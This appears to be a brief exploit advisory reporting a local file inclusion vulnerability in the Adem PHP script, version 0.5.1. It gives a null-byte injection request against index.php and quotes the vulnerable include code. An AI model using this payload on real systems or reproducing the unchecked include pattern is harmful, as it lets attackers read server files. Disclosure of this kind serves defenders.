1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 |
----------[exploit Debut] [Local File Include Vulnerability] ----------[Script Info] Author: JIKO ----------[Script Info] Site: https://github.com/4FSB/Adem && http://adem.faares.com/demo Version : 0.5.1 Download: https://codeload.github.com/4FSB/Adem/zip/master ----------[exploit Info] Exploit : http://Path/index.php?p=File%00 Line : 8-10 Page : index.php Code : if(is_file($file) && file_exists($file)){ include $file; } ----------[exploit Fin] |